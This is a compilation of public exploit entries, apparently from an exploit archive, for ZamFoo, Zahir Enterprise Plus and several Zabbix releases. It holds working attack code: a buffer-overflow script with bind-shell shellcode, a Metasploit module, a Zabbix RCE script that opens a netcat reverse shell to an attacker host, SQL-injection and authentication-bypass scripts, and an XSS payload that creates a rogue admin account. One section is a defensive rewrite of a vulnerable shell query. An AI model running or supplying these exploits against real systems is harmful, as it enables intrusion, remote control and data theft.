source: https://www.securityfocus.com/bid/60826/info
ZamFoo is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
ZamFoo 12.0 is vulnerable; other versions may also be affected.
http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`
# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccounting.com/
# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
# Tested on: Windows 7 x86/64bit
# CVE : N/A
# Category: local & privilege escalation
#
# Description
# The vulnerability occurs when Zahir cannot handle large inputs in an anomalously crafted CSV file.
# The Zahir main program fails to process the CR LF (Carriage Return Line Feed) characters, which
# causes the Zahir main program to crash.
#
# Credits to f3ci, who found the vulnerability.
#
# Proof of Concept
#!/usr/bin/python
import struct
# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c' \
# -n 20 -e x86/shikata_ga_nai -f python -v sc
# we won't worry about the space, it's big enough!
# badchars are 00,0a,0d,22,2c
sc = ""
sc += "\x92\x91\xf5\x99\x98\xf5\xd6\x48\x48\x3f\x2f\x99\x4a"
sc += "\x42\x9f\x2f\x42\x43\x43\x42\xb8\x8c\xa3\xb1\xa0\xdd"
sc += "\xc0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x53\x31\x43\x12"
sc += "\x83\xc3\x04\x03\xcf\xad\x53\x55\x33\x59\x11\x96\xcb"
sc += "\x9a\x76\x1e\x2e\xab\xb6\x44\x3b\x9c\x06\x0e\x69\x11"
sc += "\xec\x42\x99\xa2\x80\x4a\xae\x03\x2e\xad\x81\x94\x03"
sc += "\x8d\x80\x16\x5e\xc2\x62\x26\x91\x17\x63\x6f\xcc\xda"
sc += "\x31\x38\x9a\x49\xa5\x4d\xd6\x51\x4e\x1d\xf6\xd1\xb3"
sc += "\xd6\xf9\xf0\x62\x6c\xa0\xd2\x85\xa1\xd8\x5a\x9d\xa6"
sc += "\xe5\x15\x16\x1c\x91\xa7\xfe\x6c\x5a\x0b\x3f\x41\xa9"
sc += "\x55\x78\x66\x52\x20\x70\x94\xef\x33\x47\xe6\x2b\xb1"
sc += "\x53\x40\xbf\x61\xbf\x70\x6c\xf7\x34\x7e\xd9\x73\x12"
sc += "\x63\xdc\x50\x29\x9f\x55\x57\xfd\x29\x2d\x7c\xd9\x72"
sc += "\xf5\x1d\x78\xdf\x58\x21\x9a\x80\x05\x87\xd1\x2d\x51"
sc += "\xba\xb8\x39\x96\xf7\x42\xba\xb0\x80\x31\x88\x1f\x3b"
sc += "\xdd\xa0\xe8\xe5\x1a\xc6\xc2\x52\xb4\x39\xed\xa2\x9d"
sc += "\xfd\xb9\xf2\xb5\xd4\xc1\x98\x45\xd8\x17\x34\x4d\x7f"
sc += "\xc8\x2b\xb0\x3f\xb8\xeb\x1a\xa8\xd2\xe3\x45\xc8\xdc"
sc += "\x29\xee\x61\x21\xd2\x01\x2e\xac\x34\x4b\xde\xf8\xef"
sc += "\xe3\x1c\xdf\x27\x94\x5f\x35\x10\x32\x17\x5f\xa7\x3d"
sc += "\xa8\x75\x8f\xa9\x23\x9a\x0b\xc8\x33\xb7\x3b\x9d\xa4"
sc += "\x4d\xaa\xec\x55\x51\xe7\x86\xf6\xc0\x6c\x56\x70\xf9"
sc += "\x3a\x01\xd5\xcf\x32\xc7\xcb\x76\xed\xf5\x11\xee\xd6"
sc += "\xbd\xcd\xd3\xd9\x3c\x83\x68\xfe\x2e\x5d\x70\xba\x1a"
sc += "\x31\x27\x14\xf4\xf7\x91\xd6\xae\xa1\x4e\xb1\x26\x37"
sc += "\xbd\x02\x30\x38\xe8\xf4\xdc\x89\x45\x41\xe3\x26\x02"
sc += "\x45\x9c\x5a\xb2\xaa\x77\xdf\xc2\xe0\xd5\x76\x4b\xad"
sc += "\x8c\xca\x16\x4e\x7b\x08\x2f\xcd\x89\xf1\xd4\xcd\xf8"
sc += "\xf4\x91\x49\x11\x85\x8a\x3f\x15\x3a\xaa\x15"
junk = "A" * 3041
junk += '\n\r'
junk += 'A' * 380
junk += "\xeb\x08\x90\x90" # nseh
junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
junk += '\x90\x90\x90\x90'
junk += sc
junk += "D" * (5000-len(junk))
print """
#===============================================================================#
| ____ __ |
| / __/__ ___ ___ / /____ _______ _ |
| _\ \/ _ \/ -_) _ \/ __/ -_) __/ _ `/ |
| /___/ .__/\__/_//_/\__/\__/_/ \_,_/ |
| /_/ |
| |
| Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day) |
| CVE-2018-17408 |
| by modpr0be & f3ci (research[at]spentera.com) |
#===============================================================================#
"""
print "[+] Preparing for file.."
f = open('exploit.csv', 'w')
print "[+] Writing exploit code on a CSV file.."
f.write(junk)
f.close()
print "[+] Success writing file.. bring to Mr. Zahir."
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
      'Description'    => %q{
        This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
        The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
        via Import from other File. This results in overwriting a structured exception handler record.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'f3ci',     # initial discovery
          'modpr0be'  # poc and Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2018-17408' ],
          [ 'EDB', '45505' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Zahir Enterprise Plus 6 <= build 10b',
            {
              # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
              'Ret'    => 0x52016661,
              'Offset' => 3041
            }
          ]
        ],
      'Payload'        =>
        {
          'Space'       => 5000,
          'BadChars'    => "\x00\x0a\x0d\x22\x2c",
          'DisableNops' => true
        },
      'DisclosureDate' => 'Sep 28 2018',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
      ])
  end

  def exploit
    buf = rand_text_alpha_upper(target['Offset'])
    buf << "\r\n"                          # crash chars
    buf << rand_text_alpha_upper(380)      # extra chars to hit the offset
    buf << generate_seh_record(target.ret)
    buf << payload.encoded
    file_create(buf)
  end
end
CVE-2016-4338: Zabbix Agent 3.0.1 mysql.size shell command injection
--------------------------------------------------------------------
Affected products
=================
At least Zabbix Agent 1:3.0.1-1+wheezy from
http://repo.zabbix.com/zabbix/3.0/debian is vulnerable. Other versions
were not tested.
Background
==========
"Zabbix agent is deployed on a monitoring target to actively monitor
local resources and applications (hard drives, memory, processor
statistics etc).
The agent gathers operational information locally and reports data to
Zabbix server for further processing. In case of failures (such as a
hard disk running full or a crashed service process), Zabbix server
can actively alert the administrators of the particular machine that
reported the failure.
Zabbix agents are extremely efficient because of use of native system
calls for gathering statistical information."
-- https://www.zabbix.com/documentation/3.0/manual/concepts/agent
Description
===========
Zabbix agent listens on port 10050 for connections from the Zabbix
server. The commands can be built-in or user-defined.
The mysql.size user parameter defined in
/etc/zabbix/zabbix_agentd.d/userparameter_mysql.conf takes three input
parameters and uses a shell script to generate an SQL query:
UserParameter=mysql.size[*],echo "select sum($(case "$3" in both|"") echo "data_length+index_length";; data|index) echo "$3_length";; free) echo "data_free";; esac)) from information_schema.tables$([[ "$1" = "all" || ! "$1" ]] || echo " where table_schema='$1'")$([[ "$2" = "all" || ! "$2" ]] || echo "and table_name='$2'");" | HOME=/var/lib/zabbix mysql -N
The code assumes that /bin/sh is bash that supports the [[ compound
command. However, if /bin/sh is for example dash the statement
[[ "$1" = "all" || ! "$1" ]]
ends up executing the command "$1" with the argument "]]".
Exploit
=======
Zabbix sanitizes the input and blocks many dangerous characters
("\\'\"`*?[]{}~$!&;()<>|#@\n"). Since we cannot use quotes, we cannot
give our shell commands any parameters, which significantly reduces the
impact of this vulnerability. If you find a way to execute arbitrary
commands using this flaw I'd be really interested in the details. The
following proof-of-concept shows how the vulnerability can be used to
escalate privileges locally:
$ echo -en '#!/bin/bash\necho "This code is running as $(id)" 1>&2\n' > /tmp/owned
$ chmod a+rx /tmp/owned
$ echo 'mysql.size[/tmp/owned,all,both]' | nc localhost 10050 | cat -A
ZBXD^AM-^O^@^@^@^@^@^@^@sh: 1: [[: not found$
This code is running as uid=110(zabbix) gid=114(zabbix) groups=114(zabbix)$
sh: 1: [[: not found$
sh: 1: all: not found$
The exploit of course assumes that the Server line in the
configuration includes "127.0.0.1". If the agent is configured to
accept connections only from the Zabbix server, this issue can only be
exploited from the server or by spoofing the IP address of the server
(with for example ARP spoofing).
Since output of the command is piped to mysql it might be possible to
also execute some SQL commands in the database.
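As an added example (not Zabbix's shipped configuration), here is the same mysql.size query builder written with POSIX [ ] tests and an identifier allowlist, so it behaves identically under dash and bash and never hands a user-supplied value to the shell as a command; the function names and the allowlist are assumptions of this example.

```shell
#!/bin/sh
# Portable rewrite of the mysql.size UserParameter query builder (added example,
# not Zabbix's own config). Only the POSIX [ ] test is used, never bash-only [[ ]],
# so a value such as /tmp/owned is a string to compare, not a command to run.
# Schema and table names are additionally limited to identifier characters
# before they are interpolated into SQL (assumption: that is all a caller needs).

# Accept only non-empty strings made of [A-Za-z0-9_].
is_ident() {
    case "$1" in
        '' | *[!A-Za-z0-9_]*) return 1 ;;
    esac
    return 0
}

# Usage: mysql_size_query SCHEMA TABLE MODE   (same argument order as mysql.size[*])
# Prints the SQL statement on stdout; prints nothing and returns 1 on bad input.
mysql_size_query() {
    schema=$1
    table=$2
    mode=$3

    case "$mode" in
        both | '')    expr='data_length+index_length' ;;
        data | index) expr="${mode}_length" ;;
        free)         expr='data_free' ;;
        *) printf 'mysql.size: invalid mode %s\n' "$mode" >&2; return 1 ;;
    esac

    clauses=''
    # "all" or an empty value means no filter, exactly as in the original parameter.
    if [ "$schema" != all ] && [ -n "$schema" ]; then
        is_ident "$schema" || { printf 'mysql.size: invalid schema\n' >&2; return 1; }
        clauses="table_schema='$schema'"
    fi
    if [ "$table" != all ] && [ -n "$table" ]; then
        is_ident "$table" || { printf 'mysql.size: invalid table\n' >&2; return 1; }
        clauses="${clauses:+$clauses and }table_name='$table'"
    fi

    if [ -n "$clauses" ]; then
        printf 'select sum(%s) from information_schema.tables where %s;\n' "$expr" "$clauses"
    else
        printf 'select sum(%s) from information_schema.tables;\n' "$expr"
    fi
}

# The original pipes the statement into the client, e.g.:
#   mysql_size_query "$1" "$2" "$3" | HOME=/var/lib/zabbix mysql -N
```

Running this under dash with the PoC's first argument (/tmp/owned) produces an "invalid schema" error instead of executing the file.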
Author
======
This issue was discovered by Timo Lindfors from Nixu Corporation.
Timeline
========
2016-04-19: Issue discovered and reported internally for verification.
2016-04-21: Issue reported to vendor.
2016-04-22: Vendor acknowledges vulnerability and starts patching.
2016-04-26: Asked status update from vendor.
2016-04-26: Vendor responds that the issue is still being patched.
2016-04-26: CVE requested from MITRE.
2016-04-28: MITRE assigned CVE-2016-4338 for this vulnerability.
2016-05-02: Vendor published details in the issue tracker https://support.zabbix.com/browse/ZBX-10741
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1, 6.4.0 - 6.4.16 / 6.4.17rc1, 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse

HEADERS = {"Content-Type": "application/json"}


def main():
    parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
    parser.add_argument("-t", "--target", required=True, help="API URL")
    parser.add_argument("-u", "--username", required=True, help="Username")
    parser.add_argument("-p", "--password", required=True, help="Password")
    args = parser.parse_args()

    url = f"{args.target.rstrip('/')}/api_jsonrpc.php"

    # Login to get the token
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": args.username, "password": args.password},
        "id": 1,
        "auth": None
    }

    try:
        login_response = requests.post(url, json=login_data, headers=HEADERS)
        login_response.raise_for_status()
        auth_token = login_response.json().get("result")

        # Simple SQLi test
        data = {
            "jsonrpc": "2.0",
            "method": "user.get",
            "params": {
                "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
                "userids": ["1", "2"]
            },
            "id": 1,
            "auth": auth_token
        }
        test_response = requests.post(url, json=data, headers=HEADERS)
        test_response.raise_for_status()

        if "error" in test_response.text:
            print("[-] NOT VULNERABLE.")
        else:
            print("[!] VULNERABLE.")
    except requests.RequestException as e:
        print(f"[!] Request error: {e}")


if __name__ == "__main__":
    main()
# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
#!/usr/bin/python3
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore

print(Fore.YELLOW + "[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW + "[*] can reach the author @ https://hussienmisbah.github.io/")


def item_name():
    letters = string.ascii_letters
    item = ''.join(random.choice(letters) for i in range(20))
    return item


if len(sys.argv) != 6:
    print(Fore.RED + "[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")
    sys.exit(-1)

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]

s = requests.Session()
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
}
data = {
    "request": "hosts.php",
    "name": username,
    "password": password,
    "autologin": "1",
    "enter": "Sign+in"
}
proxies = {
    'http': 'http://127.0.0.1:8080'
}

r = s.post(url + "/index.php", data=data)  # proxies=proxies)
if "Sign out" not in r.text:
    print(Fore.RED + "[!] Authentication failed")
    sys.exit(-1)
if "Zabbix 5.0.17" not in r.text:
    print(Fore.RED + "[!] This is not Zabbix 5.0.17")
    sys.exit(-1)

if "filter_hostids%5B0%5D=" in r.text:
    try:
        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
        hostId = x.group(1)
    except:
        print(Fore.RED + "[!] Exploit failed to resolve HostID")
        print(Fore.BLUE + "[?] you can find it under /items then add item")
        sys.exit(-1)
else:
    print(Fore.RED + "[!] Exploit failed to resolve HostID")
    print(Fore.BLUE + "[?] you can find HostID under /items then add item")
    sys.exit(-1)

sid = re.search('<meta name="csrf-token" content="(.*)"/>', r.text).group(1)  # hidden_csrf_token
command = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()
data2 = {
    "sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"
}
r2 = s.post(url + "/items.php", data=data2, headers=headers, cookies={"tab": "0"})
no_pages = r2.text.count("?page=")

#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
flag = False
while page <= no_pages:
    r_page = s.get(url + f"/items.php?page={page}", headers=headers)
    if Random_name in r_page.text:
        print(Fore.GREEN + "[+] the payload has been Uploaded Successfully")
        x2 = re.search(rf"(\d+)[^\d]>{Random_name}", r_page.text)
        try:
            itemId = x2.group(1)
        except:
            pass
        print(Fore.GREEN + f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
        flag = True
        break
    else:
        page += 1

if flag == False:
    print(Fore.BLUE + "[?] do you know you can't upload same key twice ?")
    print(Fore.BLUE + "[?] maybe it is already uploaded so set the listener and wait 1m")
    print(Fore.BLUE + "[*] change the port and try again")
    sys.exit(-1)

#################################################[Executing the item]#################################################
data2["form"] = "update"
data2["selectedInterfaceId"] = "1"
data2["check_now"] = "Execute+now"
data2.pop("add", None)
data2["itemid"] = itemId,
print(Fore.GREEN + f"[+] set the listener at {port} please...")
r2 = s.post(url + "/items.php", data=data2, headers=headers, cookies={"tab": "0"})  # ,proxies=proxies )
print(Fore.BLUE + "[?] note : it takes up to +1 min so be patient :)")
answer = input(Fore.BLUE + "[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower():
    print(Fore.GREEN + "Nice !")
else:
    print(Fore.RED + "[!] if you find out why please contact me ")
sys.exit(0)
# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Date: 8/11/2020
# Exploit Author: Shwetabh Vishnoi
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/download
# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
# CVE : CVE-2020-15803
Affected URL/endpoint(s):
http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check
Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto" id="iframe" class="widget-url" width="100%" height="100%"></iframe>
Description: The application contains a widget functionality within the Global
View Dashboard which can be used by a malicious admin to propagate a stored
cross-site scripting attack. The "URL" widget iframe does not have any
inbuilt restrictions for the content executing within it.
Impact: The malicious webpages within iframes can be used for hosting forms
for phishing, malware propagation, forced redirections etc.
The affected Global View dashboard is displayed to all the users of the
application, so all the users will be affected by this vulnerability.
Reproduction Steps:
1. Login to the application with Admin
2. In Global View Dashboard, Add a widget
3. Select Type – “URL”, fill any random values for Name, Refresh Interval.
4. Now, in the URL parameter, enter a malicious URL.
5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.)
6. The malicious webpage containing payload will be executed on the dashboard via iFrame.
7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).
# Exploit Title: Zabbix 4.4 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Todor Donev
# Software Link: https://www.zabbix.com/download
# Version: Zabbix 4.4
# Tested on: Linux Apache/2 PHP/7.2
#
# Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
#
# Copyright 2019 (c) Todor Donev
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >>> Referer =>
# # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
# # [ >>> Content-Type => application/x-www-form-urlencoded
# # [ <<< Cache-Control => no-store, no-cache, must-revalidate
# # [ <<< Connection => close
# # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Pragma => no-cache
# # [ <<< Server => nginx
# # [ <<< Vary => Accept-Encoding
# # [ <<< Content-Type => text/html; charset=UTF-8
# # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
# # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Client-Peer =>
# # [ <<< Client-Response-Num => 1
# # [ <<< Client-SSL-Cert-Issuer =>
# # [ <<< Client-SSL-Cert-Subject =>
# # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
# # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
# # [ <<< Client-SSL-Warning => Peer certificate not verified
# # [ <<< Client-Transfer-Encoding => chunked
# # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
# # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
# # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
# # [ <<< Title => TARGET: Dashboard
# # [ <<< X-Content-Type-Options => nosniff
# # [ <<< X-Frame-Options => SAMEORIGIN
# # [ <<< X-Meta-Author => Zabbix SIA
# # [ <<< X-Meta-Charset => utf-8
# # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
# # [ <<< X-Meta-Msapplication-Config => none
# # [ <<< X-Meta-Msapplication-TileColor => #d40000
# # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
# # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
# # [ <<< X-UA-Compatible => IE=Edge
# # [ <<< X-XSS-Protection => 1; mode=block
# # [
# # [ The target is vulnerable. Try to open these links:
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
# # [ https://TARGET/zabbix/overview.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
# # [ https://TARGET/zabbix/latest.php?ddreset=1
# # [ https://TARGET/zabbix/charts.php?ddreset=1
# # [ https://TARGET/zabbix/screens.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
# # [ https://TARGET/zabbix/srv_status.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventories.php?ddreset=1
# # [ https://TARGET/zabbix/report2.php?ddreset=1
# # [ https://TARGET/zabbix/toptriggers.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
#
#!/usr/bin/perl -w
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n";
print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
    print "[\n[ The target is vulnerable. Try to open these links:\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    for my $line (@files){
        next if ($line->attr('href') =~ m/javascript/);
        next if ($line->attr('href') =~ m/\#/);
        next if ($line->attr('href') =~ m/http/);
        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
    }
} else {
    print "[ Exploit failed! The target isn't vulnerable\n";
    exit;
}
# Exploit Title: Zabbix 4.2 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Milad Khoshdel
# Software Link: https://www.zabbix.com/download
# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2
# Tested on: Linux Apache/2 PHP/7.2
# Google Dork: inurl:zabbix/zabbix.php
=========
Vulnerable Page:
=========
/zabbix.php?action=dashboard.view&dashboardid=1
=========
POC:
=========
An attacker can bypass the login page, access the dashboard page and create [Dashboard/Report/Screen/Map] elements without any username/password, anonymously.
All created elements [Dashboard/Report/Screen/Map] are accessible by other users and the admin.
REQUEST -->
GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
Host: [HOST-IP]
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
RESPONSE -->
HTTP/1.1 200 OK
Date: Sun, 06 Oct 2019 11:40:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 19239
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
[Dashboard Page Content Will Load Here]
</html>
# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux
# Reference -
https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map navigation tree
4- Paste into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click to "Add" button
==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: 1N3@CrowdShield
==========================================
Vendor Description:
=====================
Zabbix is an open source availability and performance monitoring solution.
Vulnerability Overview:
=====================
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
Business Impact:
=====================
By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
